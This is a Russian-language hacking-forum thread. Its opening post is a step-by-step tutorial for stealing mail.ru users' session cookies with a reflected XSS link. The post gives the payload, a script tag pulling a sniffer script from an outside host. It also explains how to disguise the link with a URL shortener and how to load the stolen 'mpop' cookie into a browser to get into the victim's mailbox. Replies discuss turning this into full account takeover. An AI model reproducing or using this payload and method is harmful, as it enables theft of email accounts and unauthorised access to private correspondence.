![]() |
Привет всем я хотел рассказать как можна угнать куки на mail.ru с помощью пассивной xss.
1.Нам понадобиться Пассивка 2.Сниффер я буду использовать сниффер https://hacker-pro.net/sniffer/ 3.Мозги и руки ! Так заходим на сниффер и берём Код для пассивной XSS атаки вот он Код:
%3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js>"Код:
http://mail.ru/###********=">%3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js>"Но это ещё не всё ссылка слишком подазрительная мы должны её зашифровать я буду использовать сервис http://tinyurl.com/ заходим на этот сайт и где написано Код:
Enter a long URL to make tiny:Код:
make a TinyURLКак заменить cokies ? настройки\общие настройки\расширения\cokies и найти там маил.ру cokies там будет такая вкладка mpop нажимаешь на неё и в вкладке значение вбиваешь cokies жертвы. Внимание если жертва перейдёт по ссылки и выйдет из своего мыла то куки автоматически умерают. ну чтож думаю всё ! не забываем про "+" Автор : Tickhack |
tickhack, допустим, ты получил через XSS куки mail.ru. Как с помощью них взломать мыло?
Цитата:
|
M_script после этого ты попадаешь в мыло жертвы если куки еще действительны будут!)))
|
Цитата:
только не забудь заменить куки жертвы на свои в опере |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
Потроллить решил? |
martmm, tickhack, вы неправильно поняли вопрос.
Взлом подразумевает получение полного контроля над ящиком. Как изменить пароль или данные для его восстановления, имея только куки юзера? |
Цитата:
Цитата:
|
| Время: 09:07 |